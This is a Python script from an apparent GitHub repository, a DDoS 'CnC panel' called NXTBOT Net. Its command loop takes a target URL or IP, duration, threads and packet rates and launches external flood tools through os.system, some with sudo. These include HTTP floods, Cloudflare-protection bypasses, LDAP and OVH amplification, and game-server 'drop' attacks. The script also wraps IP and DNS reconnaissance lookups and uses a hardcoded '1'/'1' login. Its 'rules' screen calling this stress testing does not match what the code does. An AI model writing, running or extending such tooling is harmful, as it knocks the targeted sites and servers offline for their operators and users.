Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
kenne400k
GitHub Repository: kenne400k/22
Path: blob/main/nxt.py
328 views
1
import socket
2
import os
3
import requests
4
import random
5
import getpass
6
import time
7
import sys
8
9
def clear():
10
os.system('cls' if os.name == 'nt' else 'clear')
11
12
proxys = open('proxies.txt').readlines()
13
bots = len(proxys)
14
15
def ascii_vro():
16
clear()
17
print(f"""
18
_.-^^---....,,--
19
_-- --_
20
< >)
21
| |
22
\._ _./
23
```--. . , ; .--'''
24
| | |
25
.-=|| | |=-.
26
`-=#$%&%$#=-'
27
| ; :|
28
_____.,-#%&$@%#&#~,._____
29
""")
30
time.sleep(0.8)
31
clear()
32
33
def si():
34
print('\x1b[38;2;0;255;255m[ \x1b[38;2;233;233;233m2007 \x1b[38;2;0;255;255m] | \x1b[38;2;233;233;233mWelcome to NXT CnC! \x1b[38;2;0;255;255m| \x1b[38;2;233;233;233mGithub: Rabbitnxt \x1b[38;2;0;255;255m| \x1b[38;2;233;233;233mNew Methods \x1b[38;2;0;255;255m+ \x1b[38;2;233;233;233mNew UI!')
35
print("")
36
37
def tools():
38
clear()
39
si()
40
print(f'''
41
\x1b[38;2;0;212;14m╔═══════════════╗
42
\x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255mTools \x1b[38;2;0;212;14m║
43
\x1b[38;2;0;212;14m╔═══════════════╩══════╦════════╩═══════════════╗
44
\x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255mgeoip \x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255mreverse-dns \x1b[38;2;0;212;14m║
45
\x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255mreverseip \x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255m<empty> \x1b[38;2;0;212;14m║
46
\x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255msubnet-lookup \x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255m<empty> \x1b[38;2;0;212;14m║
47
\x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255masn-lookup \x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255m<empty> \x1b[38;2;0;212;14m║
48
\x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255mdns-lookup \x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255m<empty> \x1b[38;2;0;212;14m║
49
\x1b[38;2;0;212;14m╚══════════════════════╩════════════════════════╝
50
''')
51
52
def rules():
53
clear()
54
si()
55
print(f'''
56
\x1b[38;2;0;212;14m╔═══════════════╗
57
\x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255mRules \x1b[38;2;0;212;14m║
58
\x1b[38;2;0;212;14m╔═══════════════╩═══════════════╩═══════════════╗
59
\x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255m1. Do not attack without someone's permission \x1b[38;2;0;212;14m║
60
\x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255m2. Do not attack .gov/.gob/.edu/.mil domains \x1b[38;2;0;212;14m║
61
\x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255m3. Do not spam attacks \x1b[38;2;0;212;14m║
62
\x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255m4. Only attack stress testing servers \x1b[38;2;0;212;14m║
63
\x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255m5. Don't skid the panel \x1b[38;2;0;212;14m║
64
\x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255m6. Give a star to the github repository \x1b[38;2;0;212;14m║
65
\x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255m7. The creator does not do any harm \x1b[38;2;0;212;14m║
66
\x1b[38;2;0;212;14m╚═══════════════════════════════════════════════╝
67
''')
68
69
def ports():
70
clear()
71
si()
72
print(f'''
73
\x1b[38;2;0;212;14m╔═══════════════╗
74
\x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255mPorts \x1b[38;2;0;212;14m║
75
\x1b[38;2;0;212;14m╔═══════════════╩═══════════════╩═══════════════╗
76
\x1b[38;2;0;212;14m║ \x1b[38;2;0;212;14m21 - \x1b[38;2;0;255;255mSFTP \x1b[38;2;0;212;14m69 - \x1b[38;2;0;255;255mTFTP \x1b[38;2;0;212;14m5060 - \x1b[38;2;0;255;255mRIP \x1b[38;2;0;212;14m║
77
\x1b[38;2;0;212;14m║ \x1b[38;2;0;212;14m22 - \x1b[38;2;0;255;255mSSH \x1b[38;2;0;212;14m80 - \x1b[38;2;0;255;255mHTTP \x1b[38;2;0;212;14m30120 - \x1b[38;2;0;255;255mFIVEM\x1b[38;2;0;212;14m║
78
\x1b[38;2;0;212;14m║ \x1b[38;2;0;212;14m23 - \x1b[38;2;0;255;255mTELNET \x1b[38;2;0;212;14m443 - \x1b[38;2;0;255;255mHTTPS \x1b[38;2;0;212;14m║
79
\x1b[38;2;0;212;14m║ \x1b[38;2;0;212;14m25 - \x1b[38;2;0;255;255mSMTP \x1b[38;2;0;212;14m3074 - \x1b[38;2;0;255;255mXBOX \x1b[38;2;0;212;14m║
80
\x1b[38;2;0;212;14m║ \x1b[38;2;0;212;14m53 - \x1b[38;2;0;255;255mDNS \x1b[38;2;0;212;14m5060 - \x1b[38;2;0;255;255mPLAYSATION \x1b[38;2;0;212;14m║
81
\x1b[38;2;0;212;14m╚═══════════════════════════════════════════════╝
82
''')
83
84
def layer7():
85
clear()
86
si()
87
print(f'''
88
\x1b[38;2;0;212;14m╔═══════════════╗
89
\x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255mLayer 7 \x1b[38;2;0;212;14m║
90
\x1b[38;2;0;212;14m╔══════════════╩════════╦══════╩══════════════╗
91
\x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255mgoat-bypass \x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255mcloudflare-uam \x1b[38;2;0;212;14m║
92
\x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255mhttp-fuzz \x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255mnormal-bypass \x1b[38;2;0;212;14m║
93
\x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255mhttp-dstat \x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255mcf-bypass \x1b[38;2;0;212;14m║
94
\x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255mautobypass \x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255mhttps-bypass \x1b[38;2;0;212;14m║
95
\x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255mhttp-rand \x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255m100up-bypass \x1b[38;2;0;212;14m║
96
\x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255mhttp-raw \x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255mhttp-flood \x1b[38;2;0;212;14m║
97
\x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255mhttp-overflow \x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255mhttp-get \x1b[38;2;0;212;14m║
98
\x1b[38;2;0;212;14m╚═══════════════════════╩═════════════════════╝
99
''')
100
101
def layer4():
102
clear()
103
si()
104
print(f'''
105
\x1b[38;2;0;212;14m╔═══════════════╗
106
\x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255mLayer 4 \x1b[38;2;0;212;14m║
107
\x1b[38;2;0;212;14m╔══════════════╩════════╦══════╩══════════════╗
108
\x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255mudp-god \x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255mldap-vro \x1b[38;2;0;212;14m║
109
\x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255mhome-god \x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255movh-fuck \x1b[38;2;0;212;14m║
110
\x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255mtelnet-god \x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255m<empty> \x1b[38;2;0;212;14m║
111
\x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255mhaven-god \x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255m<empty> \x1b[38;2;0;212;14m║
112
\x1b[38;2;0;212;14m╚═══════════════════════╩═════════════════════╝
113
''')
114
115
def amp_games():
116
clear()
117
si()
118
print(f'''
119
\x1b[38;2;0;212;14m╔═══════════════╗
120
\x1b[38;2;0;212;14m║\x1b[38;2;0;255;255m AMP's \x1b[38;2;0;212;14m/ \x1b[38;2;0;255;255mGames \x1b[38;2;0;212;14m║
121
\x1b[38;2;0;212;14m╔══════════════╩════════╦══════╩══════════════╗
122
\x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255movhamp \x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255mr6-drop \x1b[38;2;0;212;14m║
123
\x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255mfivem-drop \x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255mvse \x1b[38;2;0;212;14m║
124
\x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255mfortnite-fly \x1b[38;2;0;212;14m║ \x1b[38;2;0;255;255mgame-crash \x1b[38;2;0;212;14m║
125
\x1b[38;2;0;212;14m╚═══════════════════════╩═════════════════════╝
126
''')
127
128
129
def menu():
130
sys.stdout.write(f"\x1b]2;NXTBOT Net --> Stars: [{bots}] | Online Users: [1] | Methods: [25] | Bypass: [10] | Amps: [1]\x07")
131
clear()
132
print('\x1b[38;2;0;255;255m[ \x1b[38;2;233;233;233m2007 \x1b[38;2;0;255;255m] | \x1b[38;2;233;233;233mWelcome to NXT CnC! \x1b[38;2;0;255;255m| \x1b[38;2;233;233;233mGithub: rabbitnxt \x1b[38;2;0;255;255m| \x1b[38;2;233;233;233mNew Methods \x1b[38;2;0;255;255m+ \x1b[38;2;233;233;233mNew UI!')
133
print("")
134
print("""
135
\x1b[38;2;0;212;14m ▐ ▄ \x1b[38;2;0;186;45m▐▄• ▄ \x1b[38;2;0;113;133m▄▄▄▄▄
136
\x1b[38;2;0;212;14m•█▌▐█ \x1b[38;2;0;186;45m█▌█▌▪ \x1b[38;2;0;113;133m•██
137
\x1b[38;2;0;212;14m▐█▐▐▌ \x1b[38;2;0;186;45m·██· \x1b[38;2;0;113;133m▐█.▪
138
\x1b[38;2;0;212;14m██▐█▌ \x1b[38;2;0;186;45m▪▐█·█▌ \x1b[38;2;0;113;133m▐█▌·
139
\x1b[38;2;0;212;14m▀▀ █▪ \x1b[38;2;0;186;45m•▀▀ ▀▀ \x1b[38;2;0;113;133m▀▀▀
140
\x1b[38;2;0;212;14m╔═══════════\x1b[38;2;0;186;45m════════\x1b[38;2;0;150;88m═══════\x1b[38;2;0;113;133m═════\x1b[38;2;0;83;168m═════\x1b[38;2;0;49;147m══════════╗
141
\x1b[38;2;0;212;14m║ \x1b[38;2;239;239;239mWelcome to NXTBOT Net DDoS Panel \x1b[38;2;0;49;147m║
142
\x1b[38;2;0;212;14m║ \x1b[38;2;239;239;239mNXT's Best Dashboard \x1b[38;2;0;49;147m║
143
\x1b[38;2;0;212;14m╚═══════════\x1b[38;2;0;186;45m════════\x1b[38;2;0;150;88m═══════\x1b[38;2;0;113;133m═════\x1b[38;2;0;83;168m═════\x1b[38;2;0;49;147m══════════╝
144
\x1b[38;2;0;212;14m╔═══════════\x1b[38;2;0;186;45m════════\x1b[38;2;0;150;88m═══════\x1b[38;2;0;113;133m═════\x1b[38;2;0;83;168m═════\x1b[38;2;0;49;147m══════════╗
145
\x1b[38;2;0;212;14m║ \x1b[38;2;239;239;239mType [help] to see the NXTBOT commands. \x1b[38;2;0;49;147m║
146
\x1b[38;2;0;212;14m╚═══════════\x1b[38;2;0;186;45m════════\x1b[38;2;0;150;88m═══════\x1b[38;2;0;113;133m═════\x1b[38;2;0;83;168m═════\x1b[38;2;0;49;147m══════════╝
147
""")
148
def main():
149
menu()
150
while(True):
151
cnc = input('''\x1b[38;2;0;212;14m╔══[2007\x1b[38;2;0;186;45m@N\x1b[38;2;0;150;88mX\x1b[38;2;0;113;133mT\x1b[38;2;0;83;168mBOT\x1b[38;2;0;49;147m]
152
\x1b[38;2;0;212;14m╚\x1b[38;2;0;186;45m═\x1b[38;2;0;150;88m═\x1b[38;2;0;113;133m═\x1b[38;2;0;83;168m═\x1b[38;2;0;49;147m➤ \x1b[38;2;239;239;239m''')
153
if cnc == "layer7" or cnc == "LAYER7" or cnc == "L7" or cnc == "l7":
154
layer7()
155
elif cnc == "layer4" or cnc == "LAYER4" or cnc == "L4" or cnc == "l4":
156
layer4()
157
elif cnc == "amp/games" or cnc == "AMP/GAMES" or cnc == "amp/game" or cnc == "amps/game" or cnc == "amps/games" or cnc == "amp/games" or cnc == "AMP/GAME":
158
amp_games()
159
elif cnc == "rule" or cnc == "RULES" or cnc == "rules" or cnc == "RULES" or cnc == "RULE34":
160
rules()
161
elif cnc == "clear" or cnc == "CLEAR" or cnc == "CLS" or cnc == "cls":
162
main()
163
elif cnc == "ports" or cnc == "port" or cnc == "PORTS" or cnc == "PORT":
164
ports()
165
elif cnc == "tools" or cnc == "tool" or cnc == "TOOLS" or cnc == "TOOL":
166
tools()
167
168
elif "normal-bypass" in cnc:
169
try:
170
url = cnc.split()[1]
171
time = cnc.split()[2]
172
os.system(f'node httpbypassv2.js {url} {time}')
173
except IndexError:
174
print('Usage: normal-bypass <url> <time>')
175
print('Example: normal-bypass http://example.com 20')
176
177
elif "cf-bypass" in cnc:
178
try:
179
url = cnc.split()[1]
180
time = cnc.split()[2]
181
threads = cnc.split()[3]
182
os.system(f'node cf.js {url} {time} {threads}')
183
except IndexError:
184
print('Usage: cf-bypass <url> <time> <threads>')
185
print('Example: cf-bypass http://example-cloud.com 20 15')
186
187
elif "https-bypass" in cnc:
188
try:
189
url = cnc.split()[1]
190
time = cnc.split()[2]
191
os.system(f'node https.js {url} {time} proxies.txt')
192
except IndexError:
193
print('Usage: https-bypass <url> <time>')
194
print('Example: https-bypass http://example.org 20')
195
196
elif "http-raw" in cnc:
197
try:
198
url = cnc.split()[1]
199
time = cnc.split()[2]
200
method = cnc.split()[3]
201
os.system(f'node HTTP-RAW.js {url} {time} {method}')
202
except IndexError:
203
print('Usage: https-raw <url> <time> <GET/POST/HEAD>')
204
print('Example: http-raw http://example.com 20 POST')
205
206
elif "cloudflare-uam" in cnc:
207
try:
208
url = cnc.split()[1]
209
time = cnc.split()[2]
210
cpt = cnc.split()[3]
211
os.system(f'node uambypass.js {url} {time} {cpt} proxies.txt ')
212
except IndexError:
213
print('Usage: cloudflare-uam <url> <time> <req_per_ip>')
214
print('Example: cloudflare-uam http://example-uam.com 20 250')
215
216
elif "http-overflow" in cnc:
217
try:
218
ip = cnc.split()[1]
219
time = cnc.split()[2]
220
threads = cnc.split()[3]
221
os.system(f'./OVERFLOW {ip} {time} {threads}')
222
except IndexError:
223
print('Usage: http-overflow <ip> <time> <threads>')
224
print('Example: http-overflow 77.233.1XX.XX 30 15')
225
226
elif "http-get" in cnc:
227
try:
228
url = cnc.split()[1]
229
idk = cnc.split()[2]
230
idk1 = cnc.split()[3]
231
idk2 = cnc.split()[4]
232
os.system(f'perl httpget {url} {idk} {idk1} {idk2}')
233
except IndexError:
234
print('Usage: http-get <url> <10000> <50> <100>')
235
print('Example: http-get http://example.com 10000 50 100')
236
237
elif "http-flood" in cnc:
238
try:
239
url = cnc.split()[1]
240
threads = cnc.split()[2]
241
method = cnc.split()[3]
242
time = cnc.split()[4]
243
os.system(f'./httpflood {url} {threads} {method} {time} header.txt')
244
except IndexError:
245
print('Usage: http-flood <url> <threads> <get/post> <time>')
246
print('Example: http-flood http://example.com 15 post 30')
247
248
elif "100up-bypass" in cnc:
249
try:
250
method = cnc.split()[1]
251
ip = cnc.split()[2]
252
port = cnc.split()[3]
253
time = cnc.split()[4]
254
connections = cnc.split()[5]
255
os.system(f'./100UP-TCP {method} {ip} {port} {time} {connections}')
256
except IndexError:
257
print('Usage: 100up-bypass <GET/POST/HEAD> <ip> <port> <time> <connections')
258
print('Example: 100up-bypass GET 77.233.1XX.XX 80 20 80000')
259
260
elif "http-dstat" in cnc:
261
try:
262
url = cnc.split()[1]
263
connections = cnc.split()[2]
264
rps = cnc.split()[3]
265
os.system(f'perl dstat.pl {url} {connections} {rps} 13.87')
266
except IndexError:
267
print('Usage: http-dstat <url> <connections> <rps>')
268
print('Example: http-dstat http://example.org 50000 50000')
269
270
elif "goat-bypass" in cnc:
271
try:
272
url = cnc.split()[1]
273
time = cnc.split()[2]
274
rps = cnc.split()[3]
275
os.system(f'node method.js {url} {time} request {rps}')
276
except IndexError:
277
print('Usage: goat-bypass <url> <time> <requests_per_second>')
278
print('Example: goat-bypass http://example-protected-org 30 450')
279
280
elif "geoip" in cnc:
281
try:
282
ip = cnc.split()[1]
283
try:
284
r = requests.get(f'https://api.hackertarget.com/geoip/?q={ip}')
285
print(r.text)
286
except:
287
print("[ API Error :( ]")
288
except IndexError:
289
print('Usage: geoip <ip>')
290
print('Example: geoip 1.1.1.1')
291
292
elif "reverseip" in cnc:
293
try:
294
ip = cnc.split()[1]
295
try:
296
r = requests.get(f'https://api.hackertarget.com/reverseiplookup/?q={ip}')
297
print(r.text)
298
except:
299
print("[ API Error :( ]")
300
except IndexError:
301
print('Usage: reverseip <ip>')
302
print('Example: reverseip 1.1.1.1')
303
304
elif "subnet-lookup" in cnc:
305
try:
306
ip = cnc.split()[1]
307
try:
308
r = requests.get(f'https://api.hackertarget.com/subnetcalc/?q={ip}')
309
print(r.text)
310
except:
311
print("[ API Error :( ]")
312
except IndexError:
313
print('Usage: subnet-lookup <cdr/ip + netmask>')
314
print('Example: subnet-lookup 192.168.1.0/24')
315
316
elif "asn-lookup" in cnc:
317
try:
318
ip = cnc.split()[1]
319
try:
320
r = requests.get(f'https://api.hackertarget.com/aslookup/?q={ip}')
321
print(r.text)
322
except:
323
print("[ API Error :( ]")
324
except IndexError:
325
print('Usage: asn-lookup <ip/asn>')
326
print('Example: asn-lookup AS15169')
327
328
elif "dns-lookup" in cnc:
329
try:
330
ip = cnc.split()[1]
331
try:
332
r = requests.get(f'https://api.hackertarget.com/dnslookup/?q={ip}')
333
print(r.text)
334
except:
335
print("[ API Error :( ]")
336
except IndexError:
337
print('Usage: dns-lookup <dns>')
338
print('Example: dns-lookup google.com')
339
340
elif "reverse-dns" in cnc:
341
try:
342
ip = cnc.split()[1]
343
try:
344
r = requests.get(f'https://api.hackertarget.com/reversedns/?q={ip}')
345
print(r.text)
346
except:
347
print("[ API Error :( ]")
348
except IndexError:
349
print('Usage: reverse-dns <ip/domain>')
350
print('Example: reverse-dns 8.8.8.8')
351
352
elif "http-fuzz" in cnc:
353
try:
354
url = cnc.split()[1]
355
time = cnc.split()[2]
356
os.system(f'node httpfuzz.js {url} proxies.txt {time} POST')
357
except IndexError:
358
print(f'Usage: http-fuzz <url> <time>')
359
print("Example: http-fuzz http://sexo.org 30")
360
361
elif "autobypass" in cnc:
362
try:
363
ip = cnc.split()[1]
364
port = cnc.split()[2]
365
time = cnc.split()[3]
366
os.system(f'./AUTOBYPASS TCP {ip} {port} {time}')
367
except IndexError:
368
print('Usage: autobypass <ip> <port> <time>')
369
print('Example: autobypass 188.40.1XX.XX 80 30')
370
371
elif "http-rand" in cnc:
372
try:
373
url = cnc.split()[1]
374
time = cnc.split()[2]
375
os.system(f'node HTTP-RAND.js {url} {time}')
376
except IndexError:
377
print("Usage: http-rand <url> <time>")
378
print("Example: http-rand http://si.com 10")
379
380
elif 'ldap-vro' in cnc:
381
try:
382
ip = cnc.split()[1]
383
port = cnc.split()[2]
384
threads = cnc.split()[3]
385
pps = cnc.split()[4]
386
time = cnc.split()[5]
387
os.system(f'sudo ./ldapv2 {ip} {port} ldaplist.txt {threads} {pps} {time}')
388
except IndexError:
389
print(f'Usage: ldap-vro <ip> <port> <threads> <pps> <time>')
390
print(f'Example: ldap-vro 1.1.1.1 8739 15 1024 50')
391
392
elif "ovhamp" in cnc:
393
try:
394
ip = cnc.split()[1]
395
port = cnc.split()[2]
396
os.system(f'sudo ./OVH-AMP {ip} {port}')
397
except IndexError:
398
print(f'Usage: ovhamp <ip> <port>')
399
print(f'Example: ovhamp 1.1.1.1 34264')
400
401
elif "fivem-drop" in cnc:
402
try:
403
ip = cnc.split()[1]
404
port = cnc.split()[2]
405
threads = cnc.split()[3]
406
pps = cnc.split()[4]
407
time = cnc.split()[5]
408
os.system(f'sudo ./fivem {ip} {port} fivem.txt {threads} {pps} {time}')
409
except IndexError:
410
print('Usage: fivem-drop <ip> <port> <threads> <pps> <time>')
411
print('Example: fivem-drop 1.1.1.1 30120 15 80000 30')
412
413
elif "fortnite-fly" in cnc:
414
try:
415
ip = cnc.split()[1]
416
port = cnc.split()[2]
417
threads = cnc.split()[3]
418
time = cnc.split()[4]
419
pps = cnc.split()[5]
420
os.system(f'python3 FORTNITE-FLY.py {ip} {port} {threads} {time} {pps}')
421
except IndexError:
422
print('Usage: fornite-fly <ip> <port> <threads> <time> <pps>')
423
print(f'Example: fortnite-fly 1.1.1.1 45 30 50 100000')
424
425
elif "udp-god" in cnc:
426
try:
427
ip = cnc.split()[1]
428
port = cnc.split()[2]
429
threads = cnc.split()[3]
430
throttle = cnc.split()[4]
431
time = cnc.split()[5]
432
os.system(f'sudo ./udp {ip} {port} {threads} {throttle} {time}')
433
except IndexError:
434
print(f'Usage: udp-god <ip> <port> <threads> <throttle> <time>')
435
print(f'Example: udp-god 1.1.1.1 80 30 40000 30')
436
437
elif "haven-god" in cnc:
438
try:
439
ip = cnc.split()[1]
440
time = cnc.split()[2]
441
os.system(f'sudo ./haven -d {ip} -t {time} -z 130')
442
except IndexError:
443
print('Usage: haven-god <ip> <time>')
444
print('Example: haven-god 192.168.0.1 30')
445
446
elif "telnet-god" in cnc:
447
try:
448
ip = cnc.split()[1]
449
threads = cnc.split()[2]
450
pps = cnc.split()[3]
451
time = cnc.split()[4]
452
os.system(f'sudo ./telnet {ip} {threads} {pps} {time}')
453
except IndexError:
454
print(f'Usage: telnet-god <ip> <threads> <pps> <time>')
455
print('Example: telnet-god 192.168.0.1 30 80000 50')
456
457
elif "home-god" in cnc:
458
try:
459
ip = cnc.split()[1]
460
port = cnc.split()[2]
461
psize = cnc.split()[3]
462
time = cnc.split()[4]
463
os.system(f'perl home.pl {ip} {port} {psize} {time}')
464
except IndexError:
465
print(f'Usage: home-god <ip> <port> <packet_size> <time>')
466
print(f'Example: home-god 1.1.1.1 80 1024 50')
467
468
elif "r6-drop" in cnc:
469
try:
470
ip = cnc.split()[1]
471
port = cnc.split()[2]
472
threads = cnc.split()[3]
473
pps = cnc.split()[4]
474
time = cnc.split()[5]
475
os.system(f'sudo ./R6-DROP {ip} {port} {threads} {pps} {time}')
476
except IndexError:
477
print('Usage: r6-drop <ip> <port> <threads> <pps> <time>')
478
print('Example: r6-drop 1.1.1.1 8739 20 50000 30')
479
480
elif "vse" in cnc:
481
try:
482
ip = cnc.split()[1]
483
port = cnc.split()[2]
484
threads = cnc.split()[3]
485
time = cnc.split()[4]
486
os.system(f'sudo ./vse {ip} {port} {threads} {time}')
487
except IndexError:
488
print('Usage: vse <ip> <port> <threads> <time>')
489
print('Example: vse 1.1.1.1 80 30 50')
490
491
elif "ovh-fuck" in cnc:
492
try:
493
ip = cnc.split()[1]
494
port = cnc.split()[2]
495
os.system(f'sudo ./MertOVH {ip} {port}')
496
except IndexError:
497
print('Usage: game-crash <ip> <port>')
498
print('Example: game-crash 192.168.0.1 22')
499
500
elif "cloudflare-lag" in cnc:
501
print('Method "CLOUDFLARE-LAG" not enabled')
502
503
elif "help" in cnc:
504
print(f'''
505
═════════╦════════════════╦══════════
506
╔════════════════╩════════════════╩════════════════╗
507
╔══════════╩══════════╦══╦═════════════════════╦═══╦══════════╩══════════╗
508
║ layer7 ║ L║ game ║ L ║ tools ║
509
║ layer4 ║ ║ rules ║ ║ cls ║
510
║ amp ║ ║ ports ║ ║ <empty> ║
511
╚═════════════════════╩══╩═════════════════════╩═══╩═════════════════════╝
512
513
''')
514
else:
515
try:
516
cmmnd = cnc.split()[0]
517
print("Command: [ " + cmmnd + " ] Not Found!")
518
except IndexError:
519
pass
520
521
522
def login():
523
clear()
524
user = "1"
525
passwd = "1"
526
username = input("</> Username: ")
527
password = getpass.getpass(prompt='</> Password: ')
528
if username != user or password != passwd:
529
print("")
530
print("</> Invalid credentials! Abandoning...")
531
sys.exit(1)
532
elif username == user and password == passwd:
533
print("</> Welcome to NXTBOT CnC!")
534
time.sleep(0.3)
535
ascii_vro()
536
main()
537
538
login()
539
540